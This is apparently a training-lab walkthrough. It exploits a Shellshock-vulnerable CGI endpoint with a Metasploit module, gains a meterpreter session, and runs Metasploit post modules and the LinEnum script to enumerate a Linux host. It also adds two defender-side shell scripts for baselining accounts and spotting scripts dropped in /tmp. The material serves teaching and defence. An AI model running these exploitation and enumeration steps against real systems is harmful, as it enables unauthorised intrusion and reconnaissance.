Automating Linux System Enumeration


Solution

Step 1: Open the lab link to access the Kali GUI instance

Step 2: Identify the target IP address

To begin with, you will need to identify the target system's IP address. This can be done by
running the following command:

Command:

ifconfig

As shown in the following screenshot, locate the IP address associated with the eth1 interface; the
target IP address is the next IP within the subnet.

In this case the Kali Linux IP is 192.182.85.2, so the target IP will be 192.182.85.3.

Note: In your case the IP address will be different. Ensure that you substitute the IP shown below
with the one in your lab environment.

Step 3: Port scanning with Nmap

Now that we have identified the target IP address, we can perform a port scan to identify
vulnerable services running on the target system. This can be done by running the following
command:

Command:

nmap -sV 192.182.85.3


As shown in the following screenshot, the Nmap scan reveals that the target has a web server
running on port 80.

To save time, the web server hosts a web application that is vulnerable to ShellShock, which can
be exploited with a Metasploit exploit module.

Step 4: Gaining access

Now that we have identified the vulnerable service running on the target, we can start the
Metasploit Framework console (msfconsole) by running the following command:

Command:

msfconsole

We can now load the appropriate exploit module by running the following command:
Command:

use exploit/multi/http/apache_mod_cgi_bash_env_exec

We will now need to configure the module options, more specifically the target IP address. This
can be done by running the following command:
Command:

set RHOSTS 192.182.85.3

We will also need to set the TARGETURI option by running the following command:

Command:

set TARGETURI /gettime.cgi

We can now run the module by running the following command:

Command:

exploit

As shown in the following screenshot, if the exploit runs successfully, we will be provided with
a meterpreter session on the target system.

Step 5: Automating local enumeration with Metasploit

Now that we have gained access to the target system and have obtained a meterpreter session,
we can begin the process of automating local enumeration through the use of various Metasploit
post-exploitation modules.

To begin with, we can use the enum_configs module to enumerate various configuration files
stored on the target system.

To get started, you will need to put the meterpreter session in the background. This can be done
by running the following command:

Command:

background

We can now load the module by running the following command:

Command:

use post/linux/gather/enum_configs

We will now need to configure the module options; in this case, the only option that needs to be
configured is the SESSION ID of the meterpreter session. This can be done by running the
following command:
Command:

set SESSION 1

We can now run the module by running the following command:


Command:

run

As shown in the preceding screenshot, the module will enumerate a list of configuration files on
the Linux target that can be analyzed to learn more about the target system.

We can use the enum_network module to automate the enumeration of networking information
from the target system.

We can now load the module by running the following command:

Command:

use post/linux/gather/enum_network

We will now need to configure the module options; in this case, the only option that needs to be
configured is the SESSION ID of the meterpreter session. This can be done by running the
following command:
Command:

set SESSION 1

We can now run the module by running the following command:


Command:

run

As shown in the preceding screenshot, the module will enumerate networking information from
the target system and will store it in the local Metasploit loot directory.

As shown in the following screenshot, you can view the content of the configuration files by
using the cat utility.

Another useful module is the enum_system module that can be used to automate the
enumeration of local system information.

We can load the module by running the following command:

Command:

use post/linux/gather/enum_system

We will now need to configure the module options; in this case, the only option that needs to be
configured is the SESSION ID of the meterpreter session. This can be done by running the
following command:

Command:

set SESSION 1

We can now run the module by running the following command:

Command:

run

As shown in the preceding screenshot, the module will enumerate information like the
Distribution name and release version in addition to other system information like the version of
the Linux kernel and user accounts which will all be stored in the loot directory for offline
analysis.

We can also check if the target system is a virtual machine through the use of
the checkvm module.

We can load the module by running the following command:

Command:

use post/linux/gather/checkvm

We will now need to configure the module options; in this case, the only option that needs to be
configured is the SESSION ID of the meterpreter session. This can be done by running the
following command:
Command:

set SESSION 1

We can now run the module by running the following command:


Command:

run

As shown in the preceding screenshot, the target system is a virtual machine running on
the KVM hypervisor.
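
The modules above each collect one slice of host information and drop it into the loot directory. The following script is an added example, not part of the lab and not Metasploit code: it is the defender-side equivalent, a local inventory script that a system owner can run to baseline the same classes of data (distribution, kernel release, login-capable accounts, extra UID 0 accounts, listening sockets). The parsing helpers read from stdin so they can be exercised on constructed sample data; collect_inventory runs them against the live host. The sample os-release and passwd contents, including the backdoor account, are constructed for the demonstration and do not describe any real system.

```shell
#!/bin/sh
# Added example (not part of the lab or of Metasploit): a local inventory script that
# gathers the same classes of data as the enum_system / enum_network post modules and
# stores them in a loot-style directory for offline review. Assumes a standard Linux
# layout (/etc/os-release, /etc/passwd, ss or netstat available).

# Extract the distribution name from os-release formatted text on stdin.
os_release_name() {
  grep '^PRETTY_NAME=' | cut -d= -f2- | tr -d '"'
}

# Accounts whose login shell is interactive (passwd formatted text on stdin).
login_accounts() {
  awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 }'
}

# Accounts with UID 0 other than root; any hit deserves an explanation.
extra_uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Run the helpers against the live system and store the results in a loot-style directory.
collect_inventory() {
  out="${1:-/tmp/inventory.$$}"
  mkdir -p "$out" || return 1
  os_release_name < /etc/os-release > "$out/distro.txt" 2>/dev/null
  uname -r > "$out/kernel.txt"
  login_accounts < /etc/passwd > "$out/users.txt"
  extra_uid0_accounts < /etc/passwd > "$out/uid0.txt"
  # Listening TCP/UDP sockets: the host-side view of what a port scan would see.
  (ss -tulpn 2>/dev/null || netstat -tulpn 2>/dev/null) > "$out/listening.txt"
  printf 'inventory written to %s\n' "$out"
}

# Constructed sample data (not taken from any real host) used to demonstrate the helpers.
SAMPLE_OS_RELEASE='NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
PRETTY_NAME="Ubuntu 20.04.6 LTS"'

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
backdoor:x:0:0::/root:/bin/sh
student:x:1000:1000::/home/student:/bin/bash'

# Usage: ./inventory.sh --collect [output_dir]; with no argument, demonstrate on the sample data.
case "${1:-}" in
  --collect) collect_inventory "${2:-}" ;;
  *)
    printf 'distro: %s\n' "$(printf '%s\n' "$SAMPLE_OS_RELEASE" | os_release_name)"
    printf 'login accounts: %s\n' "$(printf '%s\n' "$SAMPLE_PASSWD" | login_accounts | paste -s -d ' ' -)"
    printf 'extra uid 0 accounts: %s\n' "$(printf '%s\n' "$SAMPLE_PASSWD" | extra_uid0_accounts)"
    ;;
esac
```

Comparing a fresh run of this script against a stored baseline is the simplest way to notice the kind of change (a new interactive account, a second UID 0 user, a new listening service) that the Metasploit modules would surface to an attacker.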

Step 6: Automating local enumeration with LinEnum

Now that we have explored how to use Metasploit modules to automate local enumeration on a
Linux target, we can begin exploring how to use LinEnum.

LinEnum is a bash script that is used by penetration testers to automate local enumeration and
identify privilege escalation vectors on Linux systems.

In order to use this script, you will need to copy it into your lab environment. To begin
with, you can access the script through the following GitHub repository:
https://github.com/rebootuser/LinEnum

On the GitHub repo, navigate to the LinEnum.sh script as shown in the following screenshot.

You will then need to view the script in raw format. This can be done by clicking the Raw button
as shown in the following screenshot.

You will now need to copy the content of the raw script and paste it into the lab
environment clipboard.

Once you have copied the script from the GitHub repo, navigate back to the Kali Linux system in
your lab environment and create a new file with a text editor like leafpad.

Then paste the script you copied into the file and save it as LinEnum.sh, as shown
in the following screenshots.

We can now navigate back to our meterpreter session and change to the /tmp directory by running
the following command:

Command:

cd /tmp

We can now upload the LinEnum.sh script we copied from the GitHub repo by running the
following command:

Command:

upload /root/Desktop/LinEnum.sh

We will now need to spawn a command shell session. This can be done by running the following
commands:

Command:

shell

Command:

/bin/bash -i

We can now run the LinEnum.sh script by running the following commands:

Command:

chmod +x LinEnum.sh

Command:

./LinEnum.sh

As shown in the following screenshot, the LinEnum.sh script will run and will display the
results in the terminal.

Take a few minutes to go through the output and analyze what information LinEnum was able to
enumerate in addition to any potentially interesting information that we were unable to
enumerate manually or with Metasploit modules.
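
The step above leaves a recognisable artefact on the host: an executable shell script uploaded into a world-writable scratch directory and then run from there. The following script is an added example, not part of the lab and not LinEnum code, showing how a system owner can check for that artefact. It walks the scratch directories given as arguments (/tmp, /var/tmp and /dev/shm by default) and reports executable regular files whose first line is a shell shebang. The make_sample_dir function builds a constructed scratch directory, with a stand-in script named LinEnum.sh and two harmless files, so the check can be exercised without touching the real /tmp; the directory names and file contents are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example (not from the lab or from LinEnum): a defender-side check for executable
# shell scripts dropped into scratch directories such as /tmp. Assumes POSIX find, head
# and grep; nothing here depends on Metasploit.

# Print executable regular files under the given directories whose first line is a
# shell shebang, one path per line. Missing directories are skipped.
find_dropped_scripts() {
  for d in "$@"; do
    [ -d "$d" ] || continue
    find "$d" -type f -perm -100 2>/dev/null | while read -r f; do
      if head -n 1 "$f" 2>/dev/null | grep -q '^#!.*sh'; then
        printf '%s\n' "$f"
      fi
    done
  done
}

# Number of flagged files, usable as an alerting threshold (0 is the expected value).
count_dropped_scripts() {
  find_dropped_scripts "$@" | wc -l | tr -d ' '
}

# Build a constructed scratch directory (assumption for the demo): one dropped
# enumeration script, one plain data file and one non-executable script. Prints its path.
make_sample_dir() {
  d=$(mktemp -d) || return 1
  printf '#!/bin/bash\n# constructed stand-in for an uploaded enumeration script\nid; uname -a\n' > "$d/LinEnum.sh"
  chmod +x "$d/LinEnum.sh"
  printf 'plain data, not executable\n' > "$d/notes.txt"
  printf '#!/bin/sh\necho not executable, so not flagged\n' > "$d/draft.sh"
  printf '%s\n' "$d"
}

# Usage: ./dropped_scripts.sh --scan [dir ...]; with no argument, run against the sample.
case "${1:-}" in
  --scan)
    shift
    [ $# -gt 0 ] || set -- /tmp /var/tmp /dev/shm
    find_dropped_scripts "$@"
    ;;
  *)
    sample=$(make_sample_dir) || exit 1
    printf 'flagged in sample directory:\n'
    find_dropped_scripts "$sample"
    printf 'count: %s\n' "$(count_dropped_scripts "$sample")"
    rm -rf "$sample"
    ;;
esac
```

The check deliberately keys on file mode and shebang rather than on a script name, because the name is the easiest thing to change; pairing it with the file's modification time and owner (ls -l on each flagged path) gives the triage context needed to decide whether a hit is a legitimate build artefact or an uploaded enumeration tool.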
